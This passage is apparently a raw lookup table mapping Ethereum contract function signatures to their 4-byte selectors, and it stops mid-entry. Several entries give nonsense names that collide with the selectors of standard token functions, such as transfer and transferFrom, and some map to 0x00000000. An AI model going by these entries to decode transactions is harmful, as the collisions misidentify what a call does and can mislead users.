"getTime(uint256)": "0x73627826", "getgateway()": "0x91837535", "setGateway(address)": "0x90646b4a", "setScore(address)": "0x9f536edd", "setShare(address)": "0x7de7a18d", "InbotProxy(address,address,address,address)": "0xab05a69a", "distributeDividends(address,uint256)": "0x64b7571f", "rolloutDividends(address)": "0xa95a3887", "scoreUp(address)": "0x1a261fda", "scoreDown(address)": "0xd23f4450", "setScore(address,uint256)": "0xee0fcc75", "resolve(uint256,uint256,string,bool)": "0x121f0a10", "dispute(uint256,uint256)": "0x1f2f7fc3", "endorse(uint256,uint256)": "0x1ea5a292", "accept(uint256,address,uint256)": "0x00b6b707", "open(uint256,uint256,uint256,string)": "0x3f43c7cf", "receiveTokenLoot(uint256,uint256,uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x65d68308", "TokenLoot(address,address,address,address,address,address)": "0x832048d4", "setScaleContractAddress(address)": "0x7e8e6d45", "setSilverContractAddress(address)": "0xd9c39fca", "setGoldContractAddress(address)": "0x5efb8266", "setXPContractAddress(address)": "0x8d0b4be5", "getClaimableAmount(address)": "0xe12f3a61", "getPlayerEnergy(address)": "0x3de3ebf8", "claimEnergy()": "0x2ab34a91", "topupEnergy(uint256)": "0x3976304e", "safeDeduct(uint256,uint256)": "0x40844a8d", "setConfig(address,uint256,uint256,uint256)": "0xecf88111", "setPaidPackage(uint256,uint256,uint256,uint256)": "0x44b07838", "EtheremonEnergy(address)": "0x2624c4eb", "settlementIsRunning()": "0xb1a9bd77", "frost()": "0xe05ea744", "initializeToken()": "0x3ed9bc86", "next_item_index()": "0x6b454d4c", "IsEthereum()": "0x4e954f87", "confirmManager()": "0xe3661586", "issuerSymbol()": "0x439d7275", "lemonContract()": "0x858e41b4", "NamiAddr()": "0x86e1e589", "investBalanceGot()": "0x6cc7d828", "SENC_HARD_CAP()": "0xb071fa2a", "icoReservedSupply()": "0x346b7939", "TOTAL_PERCRENTS()": "0xf9f7d9de", "PHASE_CHALLENGE()": "0x2d5216a5", "RoundEndTime()": "0x30f56d21", "bonus_amount()": "0xd2a32c12", "dailyHashExpires()": "0xb27b8415", "saleContributions()": "0xb1c23ce6", "totalPresaleBonus()": "0x2820d6a5", "cNiceGuyIdx()": "0x297072a1", "hitFoundationPrecent()": "0x41718066", "rubusBlackAddress()": "0x783870eb", "icoCapInWei()": "0xf71ad40e", "claimedUnits()": "0xc63ebcbb", "minChildCount()": "0x3790613f", "sellStatus()": "0xb1d0b725", "tokensPerEther2()": "0x11471e17", "Addr7()": "0x22c25c50", "reward_contract()": "0xbf88a6ff", "PRESALE_MAXIMUM_FUNDING()": "0x61962265", "countBet()": "0x93c7ca84", "dayTokenFees()": "0xe5b82bba", "mintStartYear()": "0x9d84934d", "tradingLocked()": "0x67dd7bb4", "appreciationStep()": "0x60456068", "advisory()": "0x2983d752", "_airdropTotal()": "0xc7e6926e", "totalBuriedCapsules()": "0x39900dcc", "anchors()": "0x98d35f20", "distributedTeamStakes()": "0x41b0b4cd", "teamWallet()": "0x59927044", "TOKEN_STANDARD_ERC20()": "0xa8366fef", "FOUNDATION_PERCENT()": "0xa69f7d1f", "tokensMain()": "0xdd2d4ea0", "addressFundBonus()": "0xb267f998", "quarter2()": "0x39f64289", "capEth()": "0x4e017994", "PRESALE_HARDCAP()": "0x8897b1a7", "myLatestBid()": "0xb034f3cf", "earlyPurchasesLoaded()": "0x1ad66d21", "inPresaleMode()": "0x12cacbb5", "gameNext()": "0x9a961416", "extra_time_bought()": "0x4fc7a47d", "showTotal()": "0x0ad98d71", "randomAPI_url()": "0xc695ff11", "logit()": "0x4d41fee4", "storeKey()": "0x652084c0", "treasurySupply()": "0x5fc1a4b8", "preIcoFinish()": "0x7d57a85c", "_totalDonations()": "0x2102df31", "percent1()": "0x68f6e75f", "SmartAirdrop()": "0xa8faf6f0", "updateEthToCentsRateCycleStarted()": "0xfaaf1921", "targetDiscountValue6()": "0xed15c5e6", "lockEndDate()": "0x72b60682", "fourth_whitelistSupplier()": "0x0878833d", "profitContainerAddress()": "0x25cb4f2c", "etherHolder()": "0x37fbd30f", "hoursCount()": "0x93d07d07", "FileData()": "0x50ac9828", "DISPLAY_CLASSIQUE()": "0x8ae83bf3", "getSold()": "0x8f282b87", "tier2Total()": "0x7b36277e", "admin_proportion()": "0xd21705ff", "liveSince()": "0xe8936b29", "referee()": "0x3b1bebd1", "privateIcoStartTime()": "0xcfaa759d", "initializedBlock()": "0xada5cf63", "tokenToReserve()": "0x0556369e", "YONDcoin()": "0x81a00361", "min_contribution()": "0xa2ce0f87", "recentActivityIdx()": "0xa509b030", "PRICE_MULTIPLIER_ICO4()": "0xcef29521", "firstExtendedBonusSalesEnds()": "0x5212e6ea", "PARSEC_CREDITS_PER_ETHER()": "0xd6b2e2ba", "preCrowdsaleEndTime()": "0xa5a7dadf", "contractModifierAddress()": "0x1b04803e", "winning_year()": "0x963c3397", "getPlayedGamePlayers()": "0xc3a151de", "getDistributedTokens()": "0xf145ff23", "consolationRewardsClaimPercent()": "0x6999579f", "MINCAP_TOKENS()": "0xb2e752cb", "CollectibleIndex1()": "0x28044357", "rewardPoolTokens()": "0xb4caf8be", "bountyTokenWallet()": "0xd0e6cfec", "gzePerEth()": "0xc135c040", "icoPhaseDiscountPercentage4()": "0xda9bf54c", "contract_start()": "0x925cd80d", "crowdsaleRatio()": "0xa309f589", "MANAGEMENT_TEAM_SUPPLY_LIMIT()": "0xa02b7fbe", "travelTotalEarning()": "0x70eae6c0", "modificationFee()": "0x12c3f754", "couponToken()": "0x457cf77a", "MAX_COLLECTORS()": "0x3bed93f2", "levAddress()": "0x31bd1fa5", "contractCount()": "0x8736381a", "AUTH_CANMINT()": "0xbf5103a1", "rewardGenerationComplete()": "0xc61b8a44", "getPrecision()": "0x9670c0bc", "firstRelease()": "0xda5db748", "lockingPeriodInMonths()": "0x32aeaddf", "havedAirDrop()": "0x580588a1", "percentRake()": "0x00e97827", "PREPURCHASER()": "0xb6eeb6bb", "checkIsOpen()": "0x064cfc16", "whitelistStart()": "0x994d3969", "policyActiveNum()": "0x053f598a", "STAGE_2()": "0x66801384", "globalLocked()": "0x09fa90b3", "startingDateFunding()": "0x36170ae5", "ADDR_TEAM_TOKENS_ACCOUNT()": "0x96744afb", "bonusTime()": "0xb82a0ce8", "tokensSoldToInvestors()": "0x9bb74bbd", "refundEndTime()": "0x73fddd16", "lastBlock_v11()": "0xb812a6ce", "getMin(uint8[])": "0xaaa2fe13", "genesisBlockNumber()": "0x0356fe3a", "minimumPurchaseAmount()": "0xad84eaab", "divsforall()": "0x0c71614c", "mintEndYear()": "0x16468fe2", "oldInviteAddr()": "0x9ca15d59", "setPauseSave()": "0x33506115", "initialOraclizeSettings()": "0xb7384f6b", "bandwidthFactor()": "0xf341d3ba", "createTokenToMarket2020()": "0xd0ca5e7a", "numListed()": "0x26834988", "crystalPrice()": "0xc5c5135c", "presaleFail()": "0x6ab4936d", "START_TS()": "0xb0ea1e2e", "producedBronzeCaps()": "0x67ea43bd", "gasForFLKD()": "0x7909f569", "totalWeiRaisedDuringICO2()": "0x0d73c10e", "START_ICO()": "0x1ad95744", "onceSetOwners()": "0xd8f2cd12", "VUP_PER_ETH_ICO_TIER2_RATE()": "0xada1a8f7", "producer()": "0x37612672", "CANVAS_WIDTH()": "0x71bf439e", "w_Founders()": "0xe282348c", "burnPercentage10m()": "0xb906b7b7", "gasForGR()": "0x1eb79e44", "doCoinage()": "0xecdf419a", "percentWeiJackpot()": "0x65ba12b8", "borrowerReturnFiatAmount()": "0x27f397a9", "nextDealIndex()": "0x2017ee03", "bountymanagerShare()": "0x38ecadac", "setupCompleted()": "0x609da897", "disableTransmit()": "0x1ed96e32", "saleAuctionContract()": "0x03850848", "finalValue()": "0x5c206f41", "privateSaleStartTime()": "0x940de97e", "ICO_BONUS_TIME_3()": "0xa17f0bbd", "totalFortunes()": "0x20db31d6", "minPrice()": "0xe45be8eb", "getVotingDuration()": "0xdeb0e09b", "makerDAOMedianizer()": "0x3bd137e0", "earnings()": "0x95d643a8", "refundRequestTimelock()": "0x000ca58e", "bidIncrement()": "0xb3cc167a", "seedRoundEndTime()": "0x77115c9d", "dateStartContract()": "0xf749013e", "crowdSaleAddress()": "0x0184fc35", "usdId()": "0x12cc9dd3", "MIN_RELEASE_DATE()": "0x7ee7f42a", "GenesisCallerAddress()": "0x811bab32", "offset()": "0xd5556544", "fullfillFounder()": "0x1be7c5ef", "SALES_DURATION()": "0xf396e81b", "starbitWallet()": "0x18659adb", "STAGE_1()": "0x4730bf06", "teamPercentage()": "0xd6a9e9d1", "getUSETTotalSupply()": "0xf1d59443", "phase_5_remaining_tokens()": "0x03138b31", "BONUS_TIER_6_LIMIT()": "0xdda72292", "phasePublicSale2_To()": "0xf0bbe08b", "preICOTokenHardCap()": "0x928b4cd2", "WEEFundWallet()": "0x495ccca3", "saleSharesSold()": "0xb831d137", "startICOStage2()": "0x1484e9ad", "PricePerCafe()": "0xafc6740e", "ethTaxRate()": "0xe67e3d56", "DEVELOPERS()": "0x79eee392", "fundingStartTime()": "0x1df93558", "SetEcosystemContract()": "0x1c02a63d", "total_minted()": "0xbe17be5d", "ethRateChanger()": "0xba5129b9", "bat()": "0xff72c845", "unLockTokens()": "0x1044bbe6", "ToggleMaintenance()": "0x7476865f", "delegatedFrom()": "0x26fe9951", "BEN()": "0xb7c97fa0", "ActualizePriceBeforeStart(uint256,uint256,uint256,uint256)": "0x656f6873", "UBOToken()": "0xa29fe9b1", "TAToken()": "0x3249759c", "issueAssetToAddress(bytes32,uint256,string,string,uint8,bool,address)": "0x67069544", "mashToken()": "0xca2322c2", "checkIsAssetPartOwner(bytes32,address)": "0x8c382e22", "distrust()": "0xa7dd7e37", "getPurchaseInfo(uint256,uint256,uint256,uint256,uint256,bool)": "0x8f5c2eff", "trust()": "0x6f9fdd66", "updateTier(uint256,uint256,uint256)": "0xe25a2a99", "getTierInfo(uint256)": "0xcc9d7519", "getCurrentTier()": "0x7412c223", "PURCHASE(address,uint256)": "0x2682644f", "ZBAStandardToken(uint256,string,uint8,string)": "0xaa735dd6", "emitStoreAndPay()": "0x4fe47cb4", "whitelistMinTok(uint256,address)": "0x12b68286", "whitelistMaxWei(uint256,address)": "0x385c0ecf", "DroidEIP20Token(uint256)": "0x21a33743", "tierWhitelist(uint256)": "0xe0e1104d", "currentTokensRemaining()": "0xb50d2b35", "currentEndsAt()": "0x37235758", "tierWhitelisted(uint256)": "0x8eac494c", "tierDuration(uint256)": "0x90e8265d", "tierPrice(uint256)": "0x826d3379", "tierCap(uint256)": "0xd8e9602b", "tierName(uint256)": "0xddd641b0", "saleTierList()": "0x0a35a7b1", "hasContributed(address)": "0x205b1946", "globalMinPurchaseAmt()": "0xaf2fcc17", "isConfigured()": "0xd3a057c8", "paid()": "0x295b4e17", "stored()": "0xe582dd31", "emitted()": "0xbd153c64", "expected()": "0x1ce62383", "paying()": "0x61027f78", "log(bytes32)": "0x27b7cf85", "emitting()": "0x0781f4d2", "byMaximum(bytes32,uint256)": "0x642d345c", "PotPotato()": "0xc2cf9bbb", "by(bytes32,uint256)": "0x38c73f9f", "tune(uint256)": "0xbecda0ea", "decrease(bytes32)": "0x63392843", "setBeneficiary(address,uint256,uint256,uint256)": "0x3a7343ba", "increase(bytes32)": "0x9cb998dc", "to(bytes32,bool)": "0x4ceb0173", "SimpleSaleToken()": "0x1ec6dba6", "to(bytes32,address)": "0xe1082335", "to(bytes32,uint256)": "0x44090448", "set(bytes32)": "0xdb80813f", "storing()": "0xda22ec07", "FuturXe(uint256,string,string,uint8)": "0x89e582c4", "validEvent()": "0xc21c9c21", "validPayAmt()": "0xb465307c", "validPayDest()": "0x61d7c713", "validStoreVal()": "0x0b926ecd", "validStoreDest()": "0x65f41211", "read(bytes32)": "0x61da1439", "execID()": "0x8161f0e1", "_createToken(string,address,uint256)": "0x578aa665", "none()": "0xa877db9f", "createToken(string)": "0x45576f94", "validPayBuff()": "0x6c7dde15", "createToken(string,address,uint256)": "0x73b4df05", "validEmitBuff()": "0xfe1fd352", "validStoreBuff()": "0xd571e645", "startBuffer()": "0x290d2494", "writeMessage(string,string,string,string,string)": "0x1936dd8f", "isPaying()": "0xe361112a", "getSecondsToExpiration()": "0xace4283b", "isEmitting()": "0x59c88347", "isStoring()": "0x91fb9437", "Ammbr(string,string,uint8)": "0xfc525c75", "currentAction()": "0x546ea281", "freeMem()": "0xc9ebb5e8", "buffPtr()": "0x8d6cd8de", "validState()": "0x60c6ec6f", "disableMint()": "0x34452f38", "readMulti(bytes32,bytes32[])": "0x504b122f", "read(bytes32,bytes32)": "0x65e60ef2", "SimpleSale()": "0xc13ca374", "updateStatus(address,address,uint256)": "0x5c109a59", "waitTime(address,address)": "0xb4c7abaf", "canDrip(address,address)": "0x3591a1a9", "dripToken(address,uint256)": "0x07d6a5d4", "setSingleWithdraw(uint256)": "0xcb1fa715", "turnFaucetOff()": "0xb412506b", "initialSingleWithdraw(uint256)": "0xdc730c50", "turnFaucetOn()": "0xee8734d0", "Dominator()": "0xc00941d9", "withdrawalFrom(address,address,uint256)": "0x97acb94d", "SOUNDBOY()": "0x2145465a", "MTDCERC20()": "0x0b71ff6a", "HugsByMathou()": "0x5c7a281d", "Plaak(uint256)": "0x64d03144", "returnTokensListOfAddresses()": "0xa7194e2a", "_validateHardCap(uint256)": "0x871fe6e1", "distributeManyTokens(address[])": "0x394580d2", "checkAvailableTokens(address)": "0x1b3f2fd3", "_setAllocation(address,uint256)": "0x1db087db", "removeAllocation(address)": "0xc58156e0", "getOwnersTokenList(address)": "0x1749e462", "isSubmitted(uint256)": "0xe787418a", "cancelProposal(uint256)": "0xe0a8f6f5", "submitProposal(uint256,uint256,uint256,uint8,uint64,string)": "0xfa5064be", "prepayProposal(address)": "0xeb71b7e4", "changeFeeAddress(address)": "0x285e1406", "changeBuyFeePercent(uint256)": "0xa4604a33", "changePrepaymentFee(uint256)": "0x8dfff9f2", "rangeToProposalID(uint256)": "0xd6bea5fd", "forceChangeContractOwnership(address)": "0xd613be0a", "contractOwner()": "0xce606ee0", "buyFeePercent()": "0xcc3fdd4c", "items()": "0xc06fad06", "prepaymentFee()": "0xbba2e907", "buff()": "0xa4c3dfa4", "nextProposalID()": "0x662457c6", "pendingContractOwner()": "0x5aa77d3c", "nextRangeID()": "0x31970bd8", "claimAndConvert(address[],uint256,uint256)": "0xc7ba24bc", "convert(address[],uint256,uint256)": "0xf3898a97", "claimAndConvertFor(address[],uint256,uint256,address)": "0xb1e9932b", "convertForPrioritized(address[],uint256,uint256,address,uint256,uint256,uint8,bytes32,bytes32)": "0x1134269a", "convertFor(address[],uint256,uint256,address)": "0xc98fefed", "registerEtherToken(address,bool)": "0x02ef521e", "setGasPriceLimit(address)": "0xe33051dd", "conversionHashes(bytes32)": "0x89e63a60", "etherTokens(address)": "0x8077ccf7", "withdrawTokens(address,address,uint256)": "0x5e35359e", "signerAddress()": "0x5b7633d0", "transferCallGas()": "0xbe78bb7a", "transferToICAPCallGas()": "0xafa560b0", "absMinFee()": "0xace30883", "transferFromToICAPWithReferenceCallGas()": "0xa4b7459a", "transferWithReferenceCallGas()": "0xa39385de", "allowedForwards(bytes32)": "0x9407a688", "feePercent()": "0x7fd6f15c", "transferFromWithReferenceCallGas()": "0x7afa8388", "isImmortal()": "0x77f18ed3", "forwardCallGas()": "0x71ce9a4a", "treasury()": "0x61d027b3", "transferFromCallGas()": "0x604f87d8", "transferToICAPWithReferenceCallGas()": "0x5b36fea6", "ambiC()": "0x52959d16", "refundGas()": "0x4f6d3aed", "absMaxFee()": "0x431e83ce", "approveCallGas()": "0x21538acb", "txGasPriceLimit()": "0x1a1feae1", "transferFromToICAPCallGas()": "0x12b0b3ca", "setCosignerCallGas()": "0x0787006d", "multiAsset()": "0x029a8bf7", "verifyTrustedSender(uint256,address,uint256,uint8,bytes32,bytes32)": "0xf3f18615", "setSignerAddress(address)": "0x046dc166", "YudizCoin()": "0x2402ae57", "foo(int256)": "0x4c970b2f", "NePay()": "0x8239773a", "available_assert_time(uint16,uint64)": "0x313ce567", "pizza_mandate_apology(uint256)": "0x01ffc9a7", "coral_cable_news(uint256)": "0xd55ec697", "link_classic_internal(uint64,int64)": "0x95d89b41", "ideal_warn_timed(uint256,uint128)": "0x8da5cb5b", "distributeTokens(address[],uint256[])": "0x4bd09c2a", "distributeTokens(address[],uint256)": "0x256fa241", "finishMinting(address)": "0x76192200", "salvageTokens(address,uint256)": "0xaf303a11", "finishSalvage(address)": "0xe63b029d", "setSalvageable(address,bool)": "0xc9206ddf", "freezeAccounts(address[],bool)": "0xc341b9f6", "lockAccounts(address[],uint256)": "0xe5ac7291", "isUnlockedBoth(address)": "0x5789baa5", "isUnlocked(address)": "0x2bbf532a", "switchUpgradeAgentLocked(bool)": "0xee94bdaf", "switchUpgradable(bool)": "0x683de015", "switchPaused(bool)": "0x7132ebcd", "switchCompatible223ex(bool)": "0x6ca562d6", "switchCompatible223(bool)": "0x10717a2e", "switchCompatible20(bool)": "0x4b4a5088", "TORUE()": "0xe3a75485", "sendGain()": "0xdfd84c13", "wash_list(uint128)": "0xd55ec654", "isWinner(address,bool)": "0x018b06ff", "deliverPrize(address,bytes)": "0x88896a0d", "requestPrize(bytes32,uint8,bytes32,bytes32)": "0xfb4fd984", "gamble(uint256,uint256)": "0x22e8c8fc", "gasprice_bit_ether(int128)": "0x23b872dd", "many_msg_babbage(bytes1)": "0xa9059cbb", "collate_propagate_storage(bytes16)": "0x42966c68", "testCreateShortId()": "0x243c33a1", "testFailCreateShortIdAlreadyExists()": "0x3f1bfdee", "testControlCreateShortIdAlreadyExists()": "0x917ada14", "createShortId(bytes32)": "0x53822cda", "getShortId(bytes32)": "0xd39cb111", "getItemId(bytes4)": "0x3a69ab39", "createShortId(bytes32,bytes32)": "0x4c05b40e", "blockHashAskewLimitary(uint256)": "0x00000000", "blockHashAmphithyronVersify(uint256)": "0x00000000", "blockHashAmarilloNonspontaneously(uint256)": "0x00000000", "blockHashAddendsInexpansible(uint256)": "0x00000000", "multihash(bytes32)": "0xe89401a1", "setMultihash(bytes32,bytes)": "0xaa4cb547", "triple(uint256)": "0xf40a049d", "AvailableTokenPool()": "0x071c0306", "maxWithWhitelist()": "0xb1c0f2df", "SALE_ENDED()": "0x3357db75", "SendPreReserved4()": "0x563c78b0", "preSaleTotalSupply()": "0x7cda71a6", "isCrowdSaleFinalized()": "0xe8358025", "getMaximumFundsInEuroCents()": "0xe1851b83", "totalEthBankrollReceived()": "0xc85b7941", "GAME_STARTED()": "0xa71962c2", "currentStateActive()": "0xc8398947", "exchangeId()": "0x4dafdc50", "devLimit()": "0x90525c05", "block6()": "0x9163f897", "optInFcnMinGas()": "0xc99a975d", "icoTokenLimit()": "0x8341f26c", "Group_1()": "0x122a1949", "LOVEYOUFOREVER()": "0x5574cff5", "icoEndDate()": "0x2a62738b", "ICO_TOKENCAP()": "0x978d6cff", "weiRaisedAmount()": "0x2eebe94f", "betSizeFINNEY()": "0x3973e87e", "addTokens()": "0xd5f4f0b3", "Requestprofit()": "0xca02dbe3", "lockTimestamp()": "0xb544bf83", "TOKEN_MAIN_CAP()": "0x531163c1", "VIPFee()": "0xf0a0a299", "MAX_SUPPLY_DECIMAL()": "0xeb5baebf", "bonusTotalSupply()": "0x157ddf8f", "icoPhase3EndTime()": "0x54c3b0c4", "hardCapPrice()": "0x14975cc7", "getOffChainAddresses()": "0x3f67a94e", "minPreviewInterval()": "0x749a47b7", "hgtSold()": "0xd900a6ae", "DEV_WALLET()": "0x2d04f820", "endPreICOTime()": "0x328c0ec0", "dataentryclerk()": "0x422b00bb", "voteForDisable()": "0xf79a3c25", "_FIFTY()": "0x2e5e00e1", "underNumber()": "0x5b91aa6b", "FIFTY_THOUSANDS_LIMIT()": "0x7d60e291", "PRESALE_RESERVERED_AMOUNT()": "0x74aa9e2c", "PERMISSIONMANAGER_KEY()": "0xa8ef4b66", "lastBlock_v14Hash_uint256()": "0x63b68040", "PRESALE_JOINTTOKENS()": "0xc05d1f0e", "unSoldTokens()": "0xa8c9f8ae", "minerPreSupply()": "0x8d7d2e5b", "preICOTokenIssuedTotal()": "0xcdb38f4f", "callDividend()": "0xc8cb985a", "_is()": "0x4afc7774", "confirmAllSells()": "0xe9dc438e", "winningValue()": "0xeb03fb71", "stage4Deadline()": "0xa49687d1", "MIN_REFUND_RATE_DELIMITER()": "0x694719d8", "crowdsaleCanceled()": "0xf75640b3", "virtuePlayerPoints()": "0x0ad63730", "chunk6IsAdded()": "0x08fc9ec8", "telegram()": "0x47ecb665", "show_the_minimum__reward_period()": "0x6a7b28a2", "confirmedBy()": "0xcbf2ad23", "ROUND_LENGTH()": "0x9e817c03", "kittyCoreAddress()": "0x2c2ccdfb", "ICO_start()": "0x51331732", "DonatedBanner()": "0xe43a8897", "getListCount()": "0x2ce37b10", "GnosisIssued()": "0x5652ec7e", "freezeEndsAt()": "0x6962b010", "changeStakerOperation()": "0x95b1f93b", "transferredCrowdsale()": "0xd242448c", "tadpoleReq()": "0xb334e90b", "totalRise()": "0x02099186", "MAX_PUBLIC_FUNDING_SUPPLY()": "0xaa727e46", "partnerReservedSum()": "0x60f69dc0", "nextFreeTier()": "0x1ecca316", "salesDeadline()": "0x990333be", "QbaseTalk()": "0x15d85401", "Wallet6()": "0xa4d82f95", "isDescriptionFinalized()": "0xc5044b62", "getDailyWinners()": "0x641d6075", "Candle()": "0x550271c9", "isCrowdsaleFinished()": "0xaa56c8e7", "epochLast()": "0xdc57d553", "getVipBrokerNum()": "0xae5c3f14", "categoryCount()": "0x2be32dbb", "mega()": "0xc5f98a3f", "investmentETH()": "0x5bbee518", "etherLowLimit()": "0x6c8716d8", "tentimes()": "0x0d2a25bb", "preICOendTime()": "0xa7760d79", "VINToken()": "0x2c3599a5", "eligibleTokens()": "0x273a5729", "PRESALE_WEI()": "0x6ed2fc5c", "SynTokenAddress()": "0xa0852bbd", "refunduingStartDate()": "0x2e0a020e", "bleachDailyLimit()": "0x48642e21", "TIER1END()": "0xd860ced1", "commissionPercent()": "0x77d3550b", "tip()": "0x2755cd2d", "withdrawFeeRateE4()": "0x951506d3", "startOfCrowdsale()": "0x10a0d2f1", "month()": "0x702921f5", "checkUsers(address,address)": "0xc30c0c0c", "FCMCOIN(uint256,string,string)": "0x094111be", "USDGamblingToken()": "0xa40c0a54", "OptaToken()": "0x59a8b6a3", "FITToken()": "0xa3e787b5", "Timebankc(uint256,string,string)": "0x63d08ae5", "lockAccounts(address,bool)": "0xbcaa85df", "resetUserPicture(string)": "0xb9d5d7fe", "resetUsername(string)": "0xf90f3278", "createNewUser(string,string)": "0x4dfa3f18", "hasProfilePicture(address,address)": "0xf8d29f8a", "setTheKingsQuote(string)": "0xc3946909", "getFineLevelOfUsername(string)": "0x66ec60c7", "getFineLevelOfAddress(address)": "0xcb0cedb8", "getUserPictureByUsername(string)": "0xba770154", "getUserWalletByUsername(string)": "0x2de3ad02", "getUserPictureByWallet(address)": "0x9bef0c47", "getBraggerAtIndex(uint256)": "0x0010ed99", "random3()": "0xafb0db5f", "DEJToken()": "0x91acd8fb", "votingBymy(bool)": "0xa34d2ff7", "votingByXid(uint256,bool)": "0x8171362a", "voting(uint256,uint256,bool,uint256)": "0x070b91d1", "Bitdepositary()": "0x8cbe775a", "BRoyalCoin()": "0xe43c74a4", "RSUNToken()": "0x2b5fc4ce", "PatCoin()": "0xfa09cb30", "MASIKIToken()": "0x336634bb", "setFreeCount(uint256)": "0x6a420614", "paySomeRewards(uint32,uint32)": "0x300cc37a", "Obredis()": "0xcfb009cf", "YaqootToken()": "0x513a976e", "MateriaPrima()": "0x1be4da5b", "_generate_seed(uint256)": "0xf6ddcee5", "ZEC()": "0x71e30719", "private_withdrawBankFunds(address,uint256)": "0x9fb632c1", "private_withdrawBankFunds(address)": "0x76418809", "private_setBankAddress(address)": "0xfcbf3131", "private_setMinGamePlayAmount(uint256)": "0xf03dc4e4", "private_UpdateGameBarLimit(uint256,uint256)": "0xe059c868", "private_DelGameBar(uint256)": "0xb7e05277", "private_AddGameBar(uint256,string,string,string)": "0x9e326858", "private_SetPause(bool)": "0x3d182c42", "player_cancelGame(uint256)": "0xea7858f5", "completeGame(uint256,uint256,string,address)": "0xd1976a6f", "playGame(uint256,string,string,string)": "0xf2b265ca", "playGameCheckBid(uint256)": "0x055e6d8b", "getGamesPlayerBids(uint256,address)": "0xe1e7c320", "getGamesPlayers(uint256)": "0x93c0771c", "EFH(uint256,string,uint8,string)": "0x5b630d59", "SuperToken()": "0x9b9a236b", "CMGG12StandardToken(uint256,string,uint8,string)": "0x8d9e8a76", "USCCToken()": "0x72f1301a", "createInkeTrade(bool,uint256,uint256)": "0xc69768dd", "getMemberBoss(address)": "0x47048c7b", "assignSubMember(address,uint256)": "0xfa5b344e", "giveMemberAllowance(address,uint256)": "0x23eb0197", "_fund(uint256,address)": "0xaf5ba32a", "_mine(uint256,address)": "0xe0024ae3", "goldIfFreeze(address)": "0x203e3204", "_goldUnFreeze(uint256)": "0xb55867ea", "_goldFreeze(uint256)": "0x534e05c1", "goldFreeze(address,uint256,uint256)": "0x163c17b1", "burnGold(uint256)": "0xee4d2823", "mintGold(uint256)": "0xab850a85", "goldTransfer(address,uint256)": "0xedb3623f", "goldBalanceOf(address)": "0x864ca300", "SPMTToken(address,uint256)": "0x70578bda", "Ooredoo()": "0xe52269c2", "Ultracash()": "0x4258cb76", "NIZIGEN()": "0x3f923f9d", "setup(uint256)": "0x4313b9e5", "getLockStatus(address,address)": "0xc19bbf50", "lock(uint256,uint256,uint256,uint256)": "0x260e9640", "disallowToLock(address,address)": "0x32a521c1", "allowToLock(address,address)": "0xc0db8dd8", "getTokenStatus(address)": "0xa3ff31b5", "transferNashOut(address,uint256)": "0xd1195c48", "joinPreSale(address,uint256)": "0x5ab01088", "removeSupportedToken(address,address)": "0x824eddd9", "addSupportedToken(address,address,uint256,uint256,uint256)": "0x6ed33b98", "rawTransfer(address,address,uint256)": "0x6a8d86db", "clearNewOwnerBid(address,uint256)": "0x332efa80", "market_AcceptBid(uint256,uint256)": "0x71cf5979", "market_WithdrawBid(uint256)": "0x9bdbb4c7", "market_DeclareBid(uint256)": "0x74f78412", "market_BuyForSale(uint256)": "0xa384af00", "market_WithdrawForSale(uint256)": "0xfbfb7e70", "market_DeclareForSaleToAddress(uint256,uint256,address)": "0x02fd9dd8", "market_DeclareForSale(uint256,uint256)": "0xacd9277f", "gift_Transfer(address,uint256)": "0xa59dbfb7", "gift_CreateTINAmotleyLine(string)": "0xa2eb0d01", "gift_ClaimTINAmotleyLine(uint256)": "0xfafe0902", "info_CanBeClaimed(uint256)": "0x1e0a0f60", "info_OwnerTINAmotleyLine(uint256)": "0xfb1f41f9", "info_SeeTINAmotleyLine(uint256)": "0xdfcc525d", "info_BalanceOf(address)": "0x19b0297d", "TheLightToken()": "0xddedfc19", "sendSecondBatch(address[],uint256[])": "0x2811d4e0", "sendFirstBatch(address[],uint256[])": "0x24b1905b", "OuCoin()": "0x2ec21efd", "transferReservedTokens(uint256)": "0x1d5e3350", "changeDisown(uint256)": "0x3f33252d", "changeSaleOn(uint256)": "0x65926a20", "changePeriod(uint256,uint256)": "0x5fe0e081", "changeOwnerVault(address)": "0x52a9cd2d", "BuyTokensWithAffiliate(address)": "0x230c96b9", "changeEthToTokenRation(uint8)": "0x0ec5c49a", "SaveToken()": "0x8dd5ac24", "getAffiliateSenderPosAmount(uint256)": "0xad3e0ed2", "getAffiliateSenderPosCode(uint256)": "0x7ad00589", "getAffiliateSender(bytes32)": "0x088b513e", "OpenMoneyPresale()": "0x9da67e71", "Presale(uint256,uint256,uint256,uint256,address)": "0x45048ced", "BEERS()": "0x45385448", "getOwlmasterReq()": "0x4f73f71d", "becomeOwlmaster()": "0xdf990c33", "ARCO()": "0x3461a5e8", "_delegateAssetOwnerRemoved(bytes32,address)": "0x3b594cd0", "_delegateAssetOwnerAdded(bytes32,address)": "0x006cfea8", "setupAssetOwningListener(address)": "0x8dcff4f9", "setupEventsAdmin(address)": "0x552f27f5", "assetOwnerRemoved(bytes32,address,address)": "0x26046743", "assetOwnerAdded(bytes32,address,address)": "0x660a333e", "HighCastleToken()": "0x8a3e99ff", "DelegateCallToken(uint256)": "0x93d5c520", "_currentDay()": "0xdff538e6", "_rateFromDay(uint256)": "0x70b45ca0", "_safeSub(uint256,uint256)": "0xefe8c94f", "aprMintAdjustment()": "0x6dba46ac", "APRInflationToken(uint256)": "0x26736363", "balanceDetails(address)": "0xa3aa1913", "setEthmainAddress(address,address)": "0x67535a42", "FENIX(uint256)": "0x1eaec76f", "SvinChainToken()": "0x801512af", "completeStatus(string)": "0x9710f014", "setProperty(string,string,uint256,int256,string)": "0xc038f541", "getUNTSQM()": "0xe02d306f", "setUntsqm(uint256)": "0xa2ae86ac", "setLeed(string)": "0xd65f86f2", "setDeveloper(string)": "0xc58ce220", "setParking(uint32)": "0x44b55c3a", "setGLA(uint32)": "0xda46e48e", "setGBA(uint32)": "0xa618993c", "forward_pass2(uint256[],int256[],int256[],int256[],int256[],int256[])": "0x5e815320", "access_hidden_layer(int256[],uint256[],uint256)": "0x7a4c2e9a", "get_hidden_layers(uint256[])": "0x3a10a614", "get_layer(uint256)": "0x9331a922", "relu_activation(int256)": "0xae27e3c6", "sha_data_group(int256[],int256)": "0x55d13efe", "unpack_data_groups(int256[],bool)": "0x3459fb6f", "valid_weights(int256[],uint256,uint256,uint256[])": "0xe991ae55", "randomly_select_index(uint256[])": "0x542a3368", "round_up_division(int256,int256)": "0x496bd844", "get_test_data_length()": "0xc78974de", "get_train_data_length()": "0x6bc32c7b", "finalize_contract()": 